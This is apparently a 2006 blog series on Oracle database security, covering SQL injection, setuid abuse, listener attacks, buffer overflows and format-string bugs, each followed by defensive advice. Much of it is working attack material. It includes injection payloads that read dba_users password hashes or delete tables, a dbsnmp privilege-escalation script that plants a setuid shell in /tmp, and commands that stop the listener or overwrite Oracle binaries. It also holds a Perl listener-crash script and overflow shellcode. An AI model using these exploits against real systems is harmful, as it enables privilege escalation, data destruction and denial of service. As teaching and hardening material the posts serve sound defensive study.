SQL injections are ways of attacking applications’ underlying SQL statements. Instead of expected value, intruder puts the string that expands or changes the SQL statement. Only dynamic SQL statements are susceptible to SQL injections.

SQL statement can be executed in Oracle from PL/SQL stored procedures, using dbms_sql, execute immediate or via application interface.

SQL Manipulation

The expected value for variable v1 can be something like ‘123’. If, instead, the following value is supplied for v1 variable:

v1=123’ or ‘a’=’a

SQL statement changes to:

· SELECT * from data_table where account=’123’ or ‘a’=’a’;

Example of SQL injection within EXECUTE IMMEDIATE

CREATE PROCEDURE Empl(name IN VARCHAR2) as
sqls VARCHAR2(200);
cc integer;
BEGIN
sqls := 'SELECT count(*) FROM emp
WHERE name = ''' || name || '''';
EXECUTE IMMEDIATE sqls INTO cc;
END;

SQL can be injected into Empl procedure with:

begin
Empl('Smith'' or ''1''=''1');
end;

This will turn the SELECT statement from Empl procedure:
SELECT count(*) FROM emp WHERE name = 'Smith';
to:
SELECT count(*) FROM emp WHERE name = 'Smith' or ‘1’=’1’;

To avoid this problem, use bind variables instead of string concatenation and strip the single quotes from the input string.

Other ways to inject SQL

UNION and sub-select can be also used.

Examples:

v1=123’ union select username||password
from dba_users where ‘a’=‘a

v1=123’ or exists (select ‘x’ from dual ) and ‘a’=‘a;

An intruder can use some of the known bugs for SQL injection.

Products affected: Oracle up to 9.0.1.3.

Assumption is that connected user has only CONNECT role.

SQL> connect scott/tiger

Connected.

SQL> select a.username, a.password

from sys.dba_users a left outer join sys.dba_users b on

b.username = a.username ;

USERNAME PASSWORD
------------ -----------------------------
SYS D4C5016086B2DC6A

SYSTEM D4DF7931AB130E37

RMAN E7B5D92911C831E1

CSUSER 1A00922D8C0F146

The vendor has issued a bulletin and made patches available:

http://otn.oracle.com/deploy/security/pdf/sql_joins_alert.pdf

SQL in Java

JDBC is a connectivity used by JSP, EJB and Java servlets. SQL statements are dynamic and they are executed using CallableStatement or PreparedStatement subinterfaces.

Example of the vulnerable code:

String dept = request.getParameter(“Dept");
String sql = "begin ? := Empl('" + dept + "'); end;";
CallableStatement cs = conn.prepareCall(sql);

With the injection, the code becomes:

begin ? := Empl(''); delete emp; commit; Empl(Smith''); end;

The correct way of coding is using bind variables:

CallableStatement cs= conn.prepareCall ("begin ? := Empl(?); end;");

Defense against SQL Injections

• Using bind variables
• Checking the input string for quotes and stripping them
• Checking for values that don’t make sense
• String bound the user input
• Expect use of bugs

// posted by Tatjana (Tanja) Kane @ 3/21/2006 0 comments

Setuid

Setting the setuid bit in an executable’s mode bits allows a non-privileged user to temporarily gain the privileges of another user. Many of Oracle’s executables have setuid set: oracle binary, dbsnmp, lsnrctl,...
The main workaround for setuid problem is removing the execute privilege from the “others� group.

Example:
If dbsnmp executable (owned by root) has setuid and --x for the other (i.e. -rwsr-s--x ) , you can use this exploit on Oracle 8i or 9i to change user’s read group ID to oinstall or dba (whatever is the group of dbsnmp file):

$id
uid-1008(smith) gid=14(staff)

vi /tmp/cakehole
#!/bin/sh –p
cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh
export ORACLE_HOME=/tmp
mkdir -p /tmp/network/agent/config
vi /tmp/network/agent/config/nmiconf.tcl
#!/.../oratclsh
set n [ exec /tmp/cakehole ]
$ORACLE_HOME/bin/dbsnmp start
-rwsr-sr-x 1 smith dba 95316 Apr 28 11:31 /tmp/.sh OR
-rwsr-sr-x 1 smith oinstall 95316 Apr 28 11:31 /tmp/.sh

If you want to exploit /tmp/.sh, create a C program, for example called aaa.c:

main () {
setreuid (geteuid(),-1);
setregid (getegid(),-1);
execlp (“/bin/sh�,�/bin/sh�,0); /* or use system() */
}

$ id
uid=1008(smith) gid=11(dba)

// posted by Tatjana (Tanja) Kane @ 3/21/2006 0 comments

The listener is a process that listens for incoming connections. When a request arrives, it is handed over to a database server process. Transparent Network Substrate (TNS) is the most common protocol used by Oracle clients to connect to the database via the listener.

Non-password protected listener

Listener is normally protected by firewall rules from remote intrusions, excluding connections coming from the Web server itself. It there is not firewall to protect listener, it is “a must� that the listener is protected by password. The commands start and status do not need a password until the version 9.2.0.1. Start can be used only on the local machine, while status can be used from anywhere in the network.

If you do not password protect the listener, the attacker can stop your listener and overwrite any file owned by oracle account.

Stopping the listener

If you don’t password protect your listener, anybody with access to the listening port can stop the listener. One of the ways to do it is:

Sqlplus whatever/whatever@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)
(HOST=192.168.1.1)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=PRODDB)(COMMAND=stop)))
As you can notice, you don’t actually need to provide real username and password.

Trc_file listener attack

If your listener is not password protected, anyone with access to the listening port can overwrite any file owned by Oracle, including Oracle binaries and database files.

Example for how you can overwrite Oracle binary:

• Create listener.ora on client machine
• LISTENER_rman=….
• (DESCRIPTION=…
• (SERVICE_NAME=rman)
• Lsnrctl
• > set current_listener listener_rman

• > set trc_file/ora/product/9.2/bin/oracle

Setting ADMIN_RESTRICTIONS_listener = ON in listener.ora will disallow dynamic use of set command.

o

Status

The listener responds to some of the network requests, like asking for the status. That gives away lots of information. If asked for STATUS, the listener returns information like this:

(DESCRIPTION=(TMP=)(VSNNUM=153093120)(ERR=0)(ALIAS=listener_rman)(SECURITY=OFF)
(VERSION=TNSLSNR for Solaris: Version 9.2.0.4.0- Production) (START_DATE=24APR200414:58:48)(SIDNUM=1)
(LOGFILE=/u01/oracle/product/9.2/network/log/listener.log)
(PRMFILE=/u01/oracle/product/9.2/network/admin/listener.ora)
(TRACING=off)(UPTIME=182)(SNMP=OFF)(PID=23605)).K........
(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=D8C752B7CA00-5C35-E034-000080000001)
(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=kermit)(PORT=1521))))),(SERVICE=(SERVICE_NAME=rman)
(INSTANCE=(INSTANCE_NAME=rman)(NUM=1)
(INSTANCE_STATUS=UNKNOWN)(NUMREL=1))),,.........@

NUM number 153093120 turned to HEX is 920400, which is a version number.

Listener Service_Curload attack

If you issue the command (CONNECT_DATA=(COMMAND=SERVICE_CURLOAD)) to the listener and connect, listener is fine as long as you are connected. When the user disconnects, the service will crash or stop accepting new connections.

Not all versions are vulnerable, the following versions are known to be vulnerable:
Oracle 8.1 up to 9.2.0.2, with use of MTS

Patch number 2540219 is issued to repair the problem.

With SERVICE_CURLOAD dispatchers report or ask for the current load from the listener.

9.0.1.1 Listener crash

Vulnerable systems: Oracle version 9.0.1.1.

The vulnerability allows remote attackers to cause the server's TSNLISTEN service to crash disallowing any legitimate requests from being handled by the remote server.

In order to crash Oracle9i all you need to do is send ONE TCP packet (#$00 = 1 byte) to 1521 port. To restore server functionality you must restart the TSNLISTEN service.

Sending 1 kilobyte of data in the connection string caused crash:

#!/usr/local/bin/perl -w
use IO::Socket;
$host="hostname";
socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);
sleep(2);
print HANDLE "1";
close(HANDLE);

Defence Against Listener Intrusions

• Password protect listener
• PASSWORDS_listener = 5BD62ED3F1311F2E
• Avoid dynamic use of SET command
• ADMIN_RESTRICTIONS_listener = ON
• Use LOCAL_LISTENER initialization parameter
• Each instance with different listener, on non-default port
• Use valid node checking in protocol.ora (8i) / sqlnet.ora (9i)
• tcp.validnode_checking = YES and
• tcp.excluded_nodes = {list of IP addresses}
• tcp.invited_nodes = {list of IP addresses}
• Monitor the listener logs for unexpected crashes, commands and description strings

// posted by Tatjana (Tanja) Kane @ 3/21/2006 0 comments

If you are upgrading Portal from the lower versions to 10g, using ssomig utility and getting the mentioned error, the problem could be with export/import compatibility.

Example of how I solved it:

My set-up:

• My two databases had different versions (9.0.1 and 9.2.0.5)
• 901 was the Infrastructure database
• 9205 was the old Portal repository
• The export ran on 9205 and import on 901
  

Steps:

• On 9205, run catexp.sql from the 901 home
• Copy exp.exe from the 901 home to exp901.exe in the 9205 home
• Edit the file 9205_home\sso\admin\plsql\sso\ssomigex.pl
• For Windows change the following line (for Unix, it is the one line above):
• $output=system('exp',$sso_schema.'/'.$sso_passw...
• to
• $output=system('exp901',$sso_schema.'/'.$sso_passw...
• Try again
• Run 9205_home/rdbms/admin/catexp.sql on 9205
  

// posted by Tatjana (Tanja) Kane @ 3/21/2006 0 comments

Buffer overflow attack

A buffer overflow happens when a program attempts to write more data into a buffer than was originally expected. Stack data can be overwritten, which can lead to the execution of arbitrary code, or the altering of internal program variables. Specific C functions like strcpy (), strcat (), and sprintf () are prone to overflows. If a buffer overflows the stack with garbage data, this might cause a segmentation failure.

Buffer overflow introduction

The following example will show how to use buffer overflow exploit to:

1. Overwrite root_flag variable
2. Cause segmentation fault
3. Change return address
4. Inject your own code

I executed the program exploit.c was on Linux x86:

main (int argc, char *argv[])
{
int root_flag;
char buf[10];

root_flag = (getuid() == 0 ? 1 : 0);
strcpy (buf, argv[1]); /* Buffer overflow vulnerability */
if (root_flag)
printf ("You are the root user\n");
else
printf ("Permission denied\n");
}

This program accepts one parameter. That parameter is put into the stack with command strcpy. The program has one variable root_flag. If that variable is 0 (zero), then you get the message “You are the root user.� Otherwise, you get message “Permission denied�.

Run the program with one short parameter:

./exploit 1234

Permission denied

Extend the first parameter and watch it grow on the stack:

./exploit 123412341234124312431241243

Permission denied

Change the root privilege

Add number 1 to the end of long

parameter to overwrite the root_flag variable:

./exploit 123412341234124312431241243`echo –e ‘\01’`

You are the root user

Cause a Segmentation fault

./exploit oracle12123412341234123412341234123412341234...

Segmentation fault

Change the return address with NOP sled

This is one of the ways to overwrite return address and inject your code.

./exploit `echo –e ‘\x90…\x90CODE\xa0\xa1\xff\xbf’` `

The program overwrites stack with NOP instructions, then injects the code and then overwrites the return address with 0xbfffa1a0.

This address points back into the variable part of the stack. Code might look like this “\x31\xc0\xb3\xb0\x46\xcd\x80� which executes specific assembly commands.

Note: normally, the NOP sled is thousands of bytes to allow for the fact that Linux randomises its stack location at runtime.

Buffer overflow probing

If you want to see whether binary code is susceptible to buffer overflow attack, you can try something like this

$ oracle `perl -e 'print “A"x10000'`

If you get core dump as result, you might be onto something:

Segmentation fault (core dumped)

You would then use some debugging tool to check the registers within core dump.

$ gdb oracle core
(gdb) info registers
ecx 0xbfffb5a6 -1073760856
edx 0x41414141 1094795585
ebx 0x41414141 1094795585
esp 0x41414141 0x41414141
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141 <-- AAAA

You can notice that the eip register contains AAAA. This means that the return eip value stored on the stack has been overwritten with data that we can control.

Oracle buffer overflow with loadsps

Oracle Security Alert #51

Products affected are: Oracle 8.0 up to 9.2.0.2, Intel only.

The loadsps utility loads a PSP (PL/SQL Server Page, Oracle’s answer to the Java Server page) file from the operating system into the database. The loaded PSP can then be accessed from a URL to display database content on a web page.

C:\oracle\bin> loadpsp -name -user XXX[1150 additional characters]/pwd@prod test

This buffer overflow does not result in the Oracle process crashing. However the buffer overflow can result in the saved return address being overwritten on the stack.

I tried it out on Win2000 and 8.1.7.0.0 database and it crashed the database with a segmentation fault.

Patch for this exploit is available from Oracle.

Oracle buffer overflow for database links

Oracle Security Alert #54

Products affected are Oracle 7.3 to 9.2.

create database link test1

connect to eee identified by eee

using '[XXX>1000 times] ‘;

Run select ‘x’ from dual@test1; to invoke it.

Workaround is to remove ‘CREATE DATABASE’ privilege from role CONNECT.

String format attack

The printf family of C functions (printf, sprintf, fprintf...) is vulnerable to string format attacks.

Vulnerable code might look like this:

printf(var1);

A safer syntax would be:

printf(“%s�,var1);

If instead of expected value for var1, someone puts “%x %x %x %x %x�, this turns into:

printf(�%x %x %x %x %x�)

bfffe1b3 51234a56 234535 2134fda bfffe1af

%x lists the content of a stack address in hexadecimal.

%n ,%hn, %hhn will interpret the stack address as a pointer and try to write into the target address the number of characters formatted so far with sizes of 32-bits, 16-bits and 8-bits respectively.

9iAS string format exploit for OraDAV

Products: 9iAS 9.0.2 for Windows

OraDav is an Apache based WebDav solution for interMedia, Oracle Portal & iAS 2.0. Oracle modified the Apache supplied mod_dav by adding the logging of bad gateway errors. Logging is done in the dav_util.c code. This code calls function dev_lookup_uri() and then ap_log_error. This ap_log_error function has the string format exploit.

By using the COPY method and giving a destination URI with specifically formatted schema name and port, you can produce error: “502 Bad Gateway�.

This exploit does not require a username or password. The exploit can be drilled through port 80. The vulnerability can allow us to overwrite the return address, the exception handler or the static Unhandled Exception Filter at address 0x77EE044C.

In the example shown at the Black Hat conference, the stack return address (SRA) was overwritten in a three stage overwrite, using %hn format specifiers.

The solution is to turn WebDav off, by setting “dav off� in

$OH/Apache/oradav/conf/moddav.conf. Note that OraDAV is turned ON by default.

Explicit exploit details are given in the Black Hat European 2003 conference archive, presented by David Litchfield from Next Generation Security Software Ltd.

Defence against Oracle software exploits

• Removing executable mode for the “othersâ€� from setuid files.
• find . –perm –6000 -ls
• Chmod o-x for setuid programs
• Be careful, as after this other Unix users can’t use the BEQ adapter to connect to the server. IPC can be used. That means users from the server will get ORA-12546 when trying to connect with sqlplus.
• Monitor core dumping
• Apply patch or workaround for all relevant security alerts
• Remove unused Oracle services

// posted by Tatjana (Tanja) Kane @ 3/21/2006 0 comments